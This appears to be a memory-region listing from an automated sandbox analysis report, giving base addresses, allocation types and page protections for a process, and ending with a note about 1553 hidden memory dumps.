page read and write
1B0000
heap
page read and write
436000
heap
page read and write
1B10000
trusted library allocation
page read and write
20C000
heap
page read and write
1DC0000
heap
page read and write
570000
heap
page read and write
43B000
heap
page read and write
37B4000
heap
page read and write
1C2C2000
heap
page read and write
1CB0000
heap
page read and write
58C3000
heap
page read and write
23F0000
heap
page read and write
1D8E000
stack
page read and write | page guard
50C6000
heap
page read and write
AF000
heap
page read and write
3D9000
heap
page read and write
2DA000
heap
page read and write
3F4000
heap
page read and write
300000
heap
page read and write
414000
heap
page read and write
5968000
heap
page read and write
1B0D0000
heap
page read and write
4140000
trusted library allocation
page read and write
3830000
trusted library allocation
page read and write
2199000
stack
page read and write
480E000
heap
page read and write
2B3000
heap
page read and write
4735000
heap
page read and write
540A000
heap
page read and write
58BE000
heap
page read and write
1A720000
heap
page execute and read and write
2E2000
heap
page read and write
4A3E000
trusted library allocation
page read and write
5937000
heap
page read and write
3D7000
heap
page read and write
49F0000
trusted library allocation
page read and write
40D9000
trusted library allocation
page read and write
1C2E7000
heap
page read and write
1FB0000
direct allocation
page read and write
1B380000
heap
page read and write
53F0000
heap
page read and write
5409000
heap
page read and write
40CC000
stack
page read and write
1CA0000
trusted library allocation
page read and write
5AE000
heap
page read and write
1C90000
trusted library allocation
page read and write
6571000
trusted library allocation
page read and write
58C3000
heap
page read and write
34AA000
trusted library allocation
page read and write
7831000
trusted library allocation
page read and write
3EA000
heap
page read and write
36EF000
heap
page read and write
2D0000
trusted library allocation
page read and write
7FE89BA7000
trusted library allocation
page read and write
1AE000
heap
page read and write
1CD8000
heap
page execute and read and write
7FE89A88000
trusted library allocation
page read and write
7FE89930000
trusted library allocation
page read and write
7FE89BC0000
trusted library allocation
page read and write
4A3E000
trusted library allocation
page read and write
41B000
heap
page read and write
548A000
heap
page read and write
5937000
heap
page read and write
3D60000
trusted library allocation
page read and write
4F7D000
heap
page read and write
4A10000
heap
page read and write
1E0000
heap
page read and write
4A92000
heap
page read and write
54F1000
heap
page read and write
3A0A000
trusted library allocation
page read and write
10000
heap
page read and write
5CF000
heap
page read and write
4591000
heap
page read and write
224F000
stack
page read and write
34A1000
trusted library allocation
page read and write
4080000
trusted library allocation
page read and write
59E000
heap
page read and write
4591000
heap
page read and write
33A0000
trusted library allocation
page read and write
5D4000
heap
page read and write
10000
heap
page read and write
10000
heap
page read and write
368000
stack
page read and write
247000
heap
page read and write
2931000
trusted library allocation
page read and write
1C76000
heap
page read and write
35D8000
trusted library allocation
page read and write
1B090000
heap
page read and write
2840000
heap
page read and write
1C315000
heap
page read and write
162000
heap
page read and write
570000
heap
page read and write
24F6000
trusted library allocation
page read and write
45FC000
heap
page read and write
3437000
direct allocation
page read and write
2411000
trusted library allocation
page read and write
1BF0000
heap
page read and write
462B000
heap
page read and write
5945000
heap
page read and write
4A3E000
trusted library allocation
page read and write
58C4000
heap
page read and write
5570000
heap
page read and write
1A136000
heap
page read and write
350000
heap
page read and write
1E7F000
stack
page read and write
36F000
heap
page read and write
38D000
heap
page read and write
4CED000
stack
page read and write
443000
heap
page read and write
384000
heap
page read and write
34AB000
trusted library allocation
page read and write
165000
stack
page read and write
286000
heap
page read and write
130000
trusted library allocation
page read and write
35E4000
trusted library allocation
page read and write
2B0000
heap
page read and write
450C000
heap
page read and write
3822000
heap
page read and write
375A000
heap
page read and write
1A986000
heap
page read and write
4600000
trusted library allocation
page read and write
1FF0000
heap
page execute and read and write
5968000
heap
page read and write
1A83E000
stack
page read and write
4A11000
heap
page read and write
1B5B4000
heap
page read and write
3443000
direct allocation
page read and write
26C0000
heap
page read and write
2271000
trusted library allocation
page read and write
2B54000
heap
page read and write
56D000
heap
page read and write
4FCB000
heap
page read and write
5209000
heap
page read and write
480D000
heap
page read and write
3D0000
heap
page read and write
3BC000
heap
page read and write
4A3E000
trusted library allocation
page read and write
58C3000
heap
page read and write
35DE000
trusted library allocation
page read and write
1A0FD000
heap
page read and write
396000
heap
page read and write
7FE89A60000
trusted library allocation
page execute and read and write
3819000
heap
page read and write
50CA000
heap
page read and write
3B90000
trusted library allocation
page read and write
4F9C000
heap
page read and write
4FA2000
heap
page read and write
240F000
stack
page read and write
540A000
heap
page read and write
2624000
trusted library allocation
page read and write
1A0F0000
heap
page read and write
3BC000
heap
page read and write
3DE000
heap
page read and write
45BF000
heap
page read and write
1A724000
heap
page execute and read and write
3725000
trusted library allocation
page read and write
4610000
heap
page read and write
38D000
direct allocation
page read and write
7FE89A64000
trusted library allocation
page read and write
5010000
trusted library allocation
page read and write
4A9A000
heap
page read and write
56B8000
heap
page read and write
3E5000
heap
page read and write
4F99000
heap
page read and write
38B000
heap
page read and write
596F000
heap
page read and write
4734000
heap
page read and write
5939000
heap
page read and write
35DE000
trusted library allocation
page read and write
253000
heap
page read and write
42B0000
heap
page read and write
373A000
heap
page read and write
1FD7000
direct allocation
page read and write
4598000
heap
page read and write
4AA8000
heap
page read and write
3EE000
heap
page read and write
34AE000
trusted library allocation
page read and write
160000
trusted library allocation
page read and write
50B4000
heap
page read and write
3DD000
heap
page read and write
2AA000
heap
page read and write
23FA000
heap
page read and write
7FE898A3000
trusted library allocation
page execute and read and write
27A000
heap
page read and write
239000
heap
page read and write
3ABF000
stack
page read and write
3E0000
heap
page read and write
4A3E000
trusted library allocation
page read and write
34A9000
trusted library allocation
page read and write
4A9A000
heap
page read and write
4A3E000
trusted library allocation
page read and write
10000
heap
page read and write
3DC000
heap
page read and write
37E000
heap
page read and write
373000
direct allocation
page read and write
3E5000
heap
page read and write
3819000
heap
page read and write
3E3000
heap
page read and write
437000
heap
page read and write
1C920000
heap
page read and write
12B000
stack
page read and write
1F20000
heap
page read and write
C7000
heap
page read and write
216000
heap
page read and write
2D0B000
heap
page read and write
1E30000
heap
page read and write
218000
heap
page read and write
34A5000
trusted library allocation
page read and write
24D0000
heap
page execute and read and write
217000
heap
page read and write
45F9000
heap
page read and write
596C000
heap
page read and write
4B91000
heap
page read and write
3F0000
heap
page read and write
480B000
heap
page read and write
4AA7000
heap
page read and write
4FA4000
heap
page read and write
1AF9F000
stack
page read and write
4E1D000
heap
page read and write
50CE000
heap
page read and write
34A6000
trusted library allocation
page read and write
595C000
heap
page read and write
7FE89956000
trusted library allocation
page read and write
50C4000
heap
page read and write
7FE89A57000
trusted library allocation
page read and write
4FC7000
heap
page read and write
1A8C0000
heap
page read and write
300000
heap
page read and write
35EA000
trusted library allocation
page read and write
5A7000
heap
page read and write
373F000
stack
page read and write
1C60000
heap
page read and write
23A000
heap
page read and write
53EE000
heap
page read and write
320000
heap
page read and write
4D0C000
heap
page read and write
23C000
heap
page read and write
3566000
heap
page read and write
3EB000
heap
page read and write
480E000
heap
page read and write
41B000
heap
page read and write
17C000
heap
page read and write
3F30000
heap
page read and write
2A60000
heap
page read and write
37B2000
heap
page read and write
37D000
heap
page read and write
3BC000
heap
page read and write
45F3000
heap
page read and write
238000
heap
page read and write
1D6000
heap
page read and write
2B0000
trusted library allocation
page read and write
3A7000
heap
page read and write
382A000
heap
page read and write
592E000
heap
page read and write
7FE89B60000
trusted library allocation
page read and write
7FE898AD000
trusted library allocation
page execute and read and write
3EC000
heap
page read and write
5E2000
heap
page read and write
4F8000
heap
page read and write
4AA8000
heap
page read and write
10000
heap
page read and write
1A0C4000
heap
page read and write
1B0CE000
stack
page read and write
4D5F000
heap
page read and write
79000
heap
page read and write
292E000
trusted library allocation
page read and write
7FE89A5C000
trusted library allocation
page read and write
252F000
stack
page read and write
460000
heap
page execute and read and write
391000
heap
page read and write
55C000
heap
page read and write
3822000
heap
page read and write
4FCB000
heap
page read and write
7FE89A90000
trusted library allocation
page execute and read and write
574000
heap
page read and write
40E5000
trusted library allocation
page read and write
4731000
heap
page read and write
3650000
heap
page read and write
28E000
heap
page read and write
4EED000
heap
page read and write
1C7BF000
stack
page read and write
31F000
heap
page read and write
3A07000
trusted library allocation
page read and write
3E8000
heap
page read and write
1C2AC000
stack
page read and write
5371000
heap
page read and write
2AE000
heap
page read and write
1A36E000
stack
page read and write
7FE89B00000
trusted library allocation
page read and write
7FE89B20000
trusted library allocation
page read and write
1DC000
stack
page read and write
381F000
heap
page read and write
35E1000
trusted library allocation
page read and write
3F9000
heap
page read and write
4AA9000
heap
page read and write
4FAB000
heap
page read and write
57E000
heap
page read and write
11E000
stack
page read and write
373A000
heap
page read and write
1D40000
heap
page read and write
350000
direct allocation
page read and write
36EC000
heap
page read and write
7FE89BE0000
trusted library allocation
page read and write
1FFF000
stack
page read and write
3EE000
heap
page read and write
3A09000
trusted library allocation
page read and write
7FE899A0000
trusted library allocation
page execute and read and write
360000
heap
page read and write
565000
heap
page read and write
1D0E000
heap
page execute and read and write
53EF000
heap
page read and write
375B000
heap
page read and write
4A3E000
trusted library allocation
page read and write
5FA000
heap
page read and write
7FE89B10000
trusted library allocation
page read and write
120A1000
trusted library allocation
page read and write
7FE89AF0000
trusted library allocation
page read and write
1C2CD000
heap
page read and write
43EB000
stack
page read and write
5EA000
heap
page read and write
37E000
heap
page read and write
230000
heap
page read and write
39B0000
trusted library allocation
page read and write
1F6F000
stack
page read and write
3B10000
heap
page read and write
354000
heap
page read and write
2B8000
heap
page read and write
3EF000
heap
page read and write
4A3E000
trusted library allocation
page read and write
4F9C000
heap
page read and write
3664000
heap
page read and write
1B4000
heap
page read and write
291E000
trusted library allocation
page read and write
53EE000
heap
page read and write
FE000
heap
page read and write
290D000
trusted library allocation
page read and write
1EB0000
heap
page read and write
20000
heap
page read and write
55D000
heap
page read and write
10000
heap
page read and write
3F3000
heap
page read and write
57BF000
heap
page read and write
3AB000
direct allocation
page read and write
1A740000
heap
page execute and read and write
2971000
trusted library allocation
page read and write
56AE000
heap
page read and write
1CD0000
trusted library allocation
page read and write
1AF1E000
stack
page read and write
4AA8000
heap
page read and write
4F9C000
heap
page read and write
417000
heap
page read and write
2B4000
heap
page read and write
23FA000
heap
page read and write
378000
heap
page read and write
7FE89966000
trusted library allocation
page execute and read and write
3E5000
heap
page read and write
1B570000
heap
page read and write
4A92000
heap
page read and write
1B106000
heap
page read and write
4535000
heap
page read and write
3AE000
heap
page read and write
4AA9000
heap
page read and write
7FE89BC0000
trusted library allocation
page read and write
5010000
trusted library allocation
page read and write
7FE89A37000
trusted library allocation
page read and write
3D8000
heap
page read and write
20000
heap
page read and write
3CE0000
heap
page read and write
5945000
heap
page read and write
1AEAF000
stack
page read and write
3CB000
heap
page read and write
34A5000
trusted library allocation
page read and write
4A11000
heap
page read and write
1A146000
heap
page read and write
2915000
trusted library allocation
page read and write
5DF000
heap
page read and write
5A31000
trusted library allocation
page read and write
5997000
heap
page read and write
2CD0000
heap
page read and write
500000
heap
page read and write
4A8F000
heap
page read and write
3723000
trusted library allocation
page read and write
5EB000
heap
page read and write
3EB000
heap
page read and write
4554000
heap
page read and write
36E000
heap
page read and write
2E2000
heap
page read and write
3750000
heap
page read and write
4F99000
heap
page read and write
25A000
heap
page read and write
7FE89950000
trusted library allocation
page read and write
4615000
heap
page read and write
23F1000
heap
page read and write
4631000
trusted library allocation
page read and write
7FE89AA8000
trusted library allocation
page read and write
50CC000
heap
page read and write
4A9B000
heap
page read and write
473D000
heap
page read and write
7FE89A84000
trusted library allocation
page read and write
4FA4000
heap
page read and write
4FCB000
heap
page read and write
429C000
stack
page read and write
5407000
heap
page read and write
5964000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
596F000
heap
page read and write
36E1000
heap
page read and write
3EE000
heap
page read and write
3EE000
heap
page read and write
26D000
heap
page read and write
4551000
heap
page read and write
1CA0F000
stack
page read and write
35E0000
trusted library allocation
page read and write
372000
heap
page read and write
120F1000
trusted library allocation
page read and write
5964000
heap
page read and write
3231000
trusted library allocation
page read and write
4A3E000
trusted library allocation
page read and write
1A929000
stack
page read and write
58BC000
heap
page read and write
53FE000
heap
page read and write
5953000
heap
page read and write
3FA000
heap
page read and write
21E000
heap
page read and write
54F0000
heap
page read and write
3A09000
trusted library allocation
page read and write
219000
heap
page read and write
473D000
heap
page read and write
1F50000
direct allocation
page read and write
373A000
heap
page read and write
3D8000
heap
page read and write
1E46000
heap
page read and write
1FE3000
direct allocation
page read and write
4F0000
heap
page read and write
29F000
heap
page read and write
3DC000
heap
page read and write
595C000
heap
page read and write
5FF000
heap
page read and write
7FE8989B000
trusted library allocation
page read and write
4596000
heap
page read and write
56B6000
heap
page read and write
362000
heap
page read and write
20000
heap
page read and write
4FC7000
heap
page read and write
38B000
heap
page read and write
34F0000
trusted library allocation
page read and write
28B0000
trusted library allocation
page read and write
1EF0000
heap
page read and write
4CB8000
heap
page read and write
1A92C000
heap
page read and write
50C0000
heap
page read and write
3EE000
heap
page read and write
2F3B000
trusted library allocation
page read and write
57C7000
heap
page read and write
1A8B8000
stack
page read and write
392000
heap
page read and write
3C31000
trusted library allocation
page read and write
37C000
heap
page read and write
45F3000
heap
page read and write
5200000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
1C7BC000
stack
page read and write
386000
heap
page read and write
2BA000
heap
page read and write
2F31000
trusted library allocation
page read and write
23FE000
heap
page read and write
4F9C000
heap
page read and write
3E3000
heap
page read and write
599B000
heap
page read and write
7FE89893000
trusted library allocation
page read and write
3ED000
heap
page read and write
5EF000
heap
page read and write
3C7000
heap
page read and write
8231000
trusted library allocation
page read and write
359000
heap
page read and write
4920000
trusted library allocation
page read and write
45F3000
heap
page read and write
5937000
heap
page read and write
2B00000
remote allocation
page read and write
3065000
trusted library allocation
page read and write
287B000
heap
page read and write
35D8000
trusted library allocation
page read and write
5947000
heap
page read and write
7FE89AF0000
trusted library allocation
page read and write
1E8000
heap
page read and write
7FE89B80000
trusted library allocation
page read and write
3F8000
heap
page read and write
2146000
trusted library allocation
page read and write
3FEF000
stack
page read and write
7FE89AB0000
trusted library allocation
page read and write
58C6000
heap
page read and write
3F2000
heap
page read and write
36F3000
heap
page read and write
27F1000
trusted library allocation
page read and write
7FE89B50000
trusted library allocation
page read and write
5409000
heap
page read and write
23A000
heap
page read and write
4E25000
heap
page read and write
3EE000
heap
page read and write
2922000
trusted library allocation
page read and write
4A3E000
trusted library allocation
page read and write
7FE89940000
trusted library allocation
page execute and read and write
3D71000
trusted library allocation
page read and write
34A3000
trusted library allocation
page read and write
7FE898A4000
trusted library allocation
page read and write
1A8FA000
heap
page read and write
34B2000
trusted library allocation
page read and write
339E000
stack
page read and write
5205000
heap
page read and write
45AD000
heap
page read and write
4AA9000
heap
page read and write
3DB000
heap
page read and write
27D5000
trusted library allocation
page read and write
5D3000
heap
page read and write
7FE89A42000
trusted library allocation
page read and write
57BD000
heap
page read and write
22DF000
stack
page read and write
4FD1000
heap
page read and write
4074000
trusted library allocation
page read and write
1E50000
heap
page read and write
3720000
trusted library allocation
page read and write
35E2000
trusted library allocation
page read and write
3D6000
heap
page read and write
3822000
heap
page read and write
2CB000
heap
page read and write
5409000
heap
page read and write
7FE89BA0000
trusted library allocation
page read and write
4ED6000
heap
page read and write
4A30000
heap
page read and write
280000
heap
page read and write
20000
heap
page read and write
56B8000
heap
page read and write
2845000
heap
page read and write
58BE000
heap
page read and write
1B67B000
heap
page read and write
2DF000
heap
page read and write
1B80000
heap
page read and write
7FE898B0000
trusted library allocation
page read and write
4B91000
heap
page read and write
3B4000
heap
page read and write
7FE898A2000
trusted library allocation
page read and write
3B9000
heap
page read and write
5010000
trusted library allocation
page read and write
2CB000
heap
page read and write
4AA9000
heap
page read and write
4D4D000
heap
page read and write
4A3E000
trusted library allocation
page read and write
2E4B000
stack
page read and write
3B2000
heap
page read and write
5968000
heap
page read and write
4AA9000
heap
page read and write
3E8000
heap
page read and write
2CB000
heap
page read and write
3E4000
heap
page read and write
40D9000
trusted library allocation
page read and write
244000
heap
page read and write
2E9000
heap
page read and write
2D8000
heap
page read and write
417000
heap
page read and write
390000
direct allocation
page read and write
160000
trusted library allocation
page read and write
572000
heap
page read and write
3550000
heap
page read and write
7FE89BD0000
trusted library allocation
page read and write
267000
heap
page read and write
33A000
heap
page read and write
472E000
heap
page read and write
170000
heap
page read and write
22F000
heap
page read and write
3DF000
heap
page read and write
570000
heap
page read and write
36F1000
heap
page read and write
45F7000
heap
page read and write
56AD000
heap
page read and write
2F3E000
trusted library allocation
page read and write
3E4000
heap
page read and write
1A728000
heap
page execute and read and write
387000
heap
page read and write
58E000
heap
page read and write
35EA000
trusted library allocation
page read and write
45F9000
heap
page read and write
7FE89890000
trusted library allocation
page read and write
53B0000
heap
page read and write
4AAB000
heap
page read and write
4F95000
heap
page read and write
2A3000
heap
page read and write
4A3E000
trusted library allocation
page read and write
50C0000
heap
page read and write
1CE0000
heap
page read and write
14F000
heap
page read and write
444000
heap
page read and write
2B0000
heap
page read and write
4734000
heap
page read and write
1A20C000
stack
page read and write
3FCE000
trusted library allocation
page read and write
45F9000
heap
page read and write
3AF000
direct allocation
page read and write
3437000
direct allocation
page read and write
210000
heap
page read and write
4FA5000
heap
page read and write
473D000
heap
page read and write
3EC000
heap
page read and write
473D000
heap
page read and write
7FE89C00000
trusted library allocation
page read and write
40E5000
trusted library allocation
page read and write
5970000
heap
page read and write
140000
trusted library allocation
page read and write
162000
heap
page read and write
4A3E000
trusted library allocation
page read and write
1DC000
stack
page read and write
45FF000
heap
page read and write
5371000
heap
page read and write
1B575000
heap
page read and write
2310000
heap
page execute and read and write
375C000
heap
page read and write
1A75E000
heap
page execute and read and write
2070000
heap
page execute and read and write
519000
heap
page read and write
269000
heap
page read and write
24C8000
stack
page read and write
262000
heap
page read and write
41B000
heap
page read and write
5409000
heap
page read and write
3E7000
heap
page read and write
2270000
heap
page read and write
1C1ED000
heap
page read and write
7FE89A3C000
trusted library allocation
page read and write
4AAB000
heap
page read and write
7FE89B10000
trusted library allocation
page read and write
35D5000
trusted library allocation
page read and write
3EB000
heap
page read and write
375F000
heap
page read and write
7FE899C0000
trusted library allocation
page execute and read and write
4FCB000
heap
page read and write
4069000
trusted library allocation
page read and write
54F1000
heap
page read and write
50CC000
heap
page read and write
5F8000
heap
page read and write
3055000
trusted library allocation
page read and write
397000
direct allocation
page read and write
20EF000
stack
page read and write
41B000
heap
page read and write
35B000
heap
page read and write
35E3000
trusted library allocation
page read and write
4E1D000
heap
page read and write
5409000
heap
page read and write
53EF000
heap
page read and write
1A77E000
heap
page execute and read and write
248000
heap
page read and write
4FA2000
heap
page read and write
1A16F000
heap
page read and write
1CD0000
heap
page execute and read and write
50BB000
heap
page read and write
4AA9000
heap
page read and write
2F39000
trusted library allocation
page read and write
4430000
heap
page read and write
2DF000
heap
page read and write
3BC000
heap
page read and write
420000
direct allocation
page read and write
3DC000
heap
page read and write
4558000
heap
page read and write
1B5B9000
heap
page read and write
2B0000
heap
page read and write
7FE89936000
trusted library allocation
page read and write
4EED000
heap
page read and write
4A8D000
heap
page read and write
2150000
heap
page read and write
37B4000
heap
page read and write
544000
heap
page read and write
3FAF000
stack
page read and write
7FE89A70000
trusted library allocation
page execute and read and write
403000
heap
page read and write
1C1E9000
heap
page read and write
34AD000
trusted library allocation
page read and write
4C11000
heap
page read and write
444000
heap
page read and write
438000
heap
page read and write
36D0000
heap
page read and write
4A9A000
heap
page read and write
5E3000
heap
page read and write
23EE000
heap
page read and write
7FE89A70000
trusted library allocation
page execute and read and write
56C0000
heap
page read and write
54D000
heap
page read and write
1C2F5000
heap
page read and write
4A3E000
trusted library allocation
page read and write
2B6000
heap
page read and write
1B01F000
stack
page read and write
41F000
heap
page read and write
594D000
heap
page read and write
5968000
heap
page read and write
7FE89A62000
trusted library allocation
page read and write
1CC0000
heap
page read and write
2E3000
heap
page read and write
4A3E000
trusted library allocation
page read and write
3DC000
heap
page read and write
1C40000
heap
page read and write
382F000
heap
page read and write
3F8000
heap
page read and write
1B0A0000
heap
page read and write
38B000
direct allocation
page read and write
384000
heap
page read and write
54F1000
heap
page read and write
34AF000
trusted library allocation
page read and write
3E5000
heap
page read and write
5409000
heap
page read and write
20000
heap
page read and write
2B50000
heap
page read and write
1F24000
heap
page read and write
53EE000
heap
page read and write
4557000
heap
page read and write
1C0DE000
stack
page read and write
4F1A000
heap
page read and write
410000
heap
page read and write
1F30000
direct allocation
page read and write
54F0000
heap
page read and write
53EE000
heap
page read and write
56B8000
heap
page read and write
4F1F000
heap
page read and write
2F9F000
stack
page read and write
10000
heap
page read and write
3816000
heap
page read and write
4591000
heap
page read and write
3A0F000
trusted library allocation
page read and write
1AB7D000
stack
page read and write
4B91000
heap
page read and write
3D0000
direct allocation
page read and write
5031000
trusted library allocation
page read and write
1A8C3000
heap
page read and write
29F000
heap
page read and write
4A9D000
heap
page read and write
3A9D000
stack
page read and write
2B2000
heap
page read and write
42C0000
trusted library allocation
page read and write
5B71000
trusted library allocation
page read and write
35DE000
trusted library allocation
page read and write
3F0000
heap
page read and write
3A9000
heap
page read and write
350000
heap
page read and write
7FE89884000
trusted library allocation
page read and write
1AE000
heap
page read and write
23B000
heap
page read and write
4ED1000
heap
page read and write
1E0000
heap
page read and write
50D0000
trusted library allocation
page read and write
23FA000
heap
page read and write
7FE89AA0000
trusted library allocation
page read and write
50CE000
heap
page read and write
7FE89A50000
trusted library allocation
page execute and read and write
1B55E000
stack
page read and write
1B1000
heap
page read and write
2C9000
heap
page read and write
3E70000
trusted library allocation
page read and write
7FE89BA0000
trusted library allocation
page read and write
36EF000
heap
page read and write
45AC000
heap
page read and write
20000
heap
page read and write
5964000
heap
page read and write
39FF000
trusted library allocation
page read and write
5370000
heap
page read and write
12121000
trusted library allocation
page read and write
36FE000
stack
page read and write
49C0000
trusted library allocation
page read and write
43C000
heap
page read and write
34B4000
trusted library allocation
page read and write
1C1BB000
stack
page read and write
58C2000
heap
page read and write
4A8D000
heap
page read and write
1C80000
trusted library allocation
page read and write
27E2000
trusted library allocation
page read and write
403000
heap
page read and write
5409000
heap
page read and write
43B000
heap
page read and write
3B0000
direct allocation
page read and write
472C000
heap
page read and write
35E000
heap
page read and write
7FE89B80000
trusted library allocation
page read and write
574000
heap
page read and write
563000
heap
page read and write
3D8000
heap
page read and write
1AE000
heap
page read and write
2A9000
heap
page read and write
5949000
heap
page read and write
3A50000
trusted library allocation
page read and write
453E000
heap
page read and write
50C4000
heap
page read and write
5409000
heap
page read and write
23C000
heap
page read and write
4AA9000
heap
page read and write
1B32C000
stack
page read and write
1D00000
trusted library allocation
page read and write
36F000
heap
page read and write
463B000
heap
page read and write
7FE89883000
trusted library allocation
page execute and read and write
35E0000
trusted library allocation
page read and write
3D0000
heap
page read and write
3490000
remote allocation
page read and write
3B0000
direct allocation
page read and write
45F7000
heap
page read and write
1B1000
heap
page read and write
4E67000
heap
page read and write
26A000
heap
page read and write
440000
direct allocation
page read and write
4FA2000
heap
page read and write
4619000
heap
page read and write
4B92000
heap
page read and write
463B000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
34B0000
trusted library allocation
page read and write
10000
heap
page read and write
53FA000
heap
page read and write
5947000
heap
page read and write
3E7000
heap
page read and write
5968000
heap
page read and write
1C00000
heap
page read and write
3EDE000
stack
page read and write
4AA9000
heap
page read and write
596F000
heap
page read and write
3E5000
heap
page read and write
592E000
heap
page read and write
398000
heap
page read and write
7FE89BD0000
trusted library allocation
page read and write
5E8000
heap
page read and write
1AC0000
heap
page read and write
1E40000
heap
page read and write
3EC0000
trusted library allocation
page read and write
5026000
heap
page read and write
23B0000
heap
page read and write
2F42000
trusted library allocation
page read and write
45C2000
heap
page read and write
3CB0000
trusted library allocation
page read and write
370000
heap
page read and write
3DC000
heap
page read and write
504D000
heap
page read and write
504A000
heap
page read and write
3EE000
heap
page read and write
348000
heap
page read and write
2C5C000
stack
page read and write
37C000
heap
page read and write
3FF0000
trusted library allocation
page read and write
12C000
heap
page read and write
4970000
trusted library allocation
page read and write
3DC000
heap
page read and write
7FE89B40000
trusted library allocation
page read and write
1A0EA000
heap
page read and write
53E000
heap
page read and write
3F1000
heap
page read and write
1C246000
heap
page read and write
40E0000
trusted library allocation
page read and write
7FE89BE0000
trusted library allocation
page read and write
3A9000
heap
page read and write
4F24000
heap
page read and write
2A6000
heap
page read and write
2A3000
heap
page read and write
4A8D000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
7FE89B30000
trusted library allocation
page read and write
36ED000
heap
page read and write
319B000
stack
page read and write
403000
heap
page read and write
1B099000
heap
page read and write
389000
heap
page read and write
3C60000
trusted library allocation
page read and write
310000
heap
page read and write
437000
heap
page read and write
3E5000
heap
page read and write
354000
heap
page read and write
5785000
heap
page read and write
22A000
heap
page read and write
41F000
heap
page read and write
1E30000
heap
page read and write
598E000
heap
page read and write
3E3000
heap
page read and write
5409000
heap
page read and write
8C31000
trusted library allocation
page read and write
2E2000
heap
page read and write
34B2000
trusted library allocation
page read and write
45FD000
heap
page read and write
453E000
heap
page read and write
7FE89986000
trusted library allocation
page execute and read and write
437000
heap
page read and write
4558000
heap
page read and write
3F8000
heap
page read and write
3F4000
heap
page read and write
246E000
trusted library allocation
page read and write
573000
heap
page read and write
393000
direct allocation
page read and write
272000
heap
page read and write
4F97000
heap
page read and write
626000
heap
page read and write
5939000
heap
page read and write
There are 1553 hidden memdumps, click here to show them.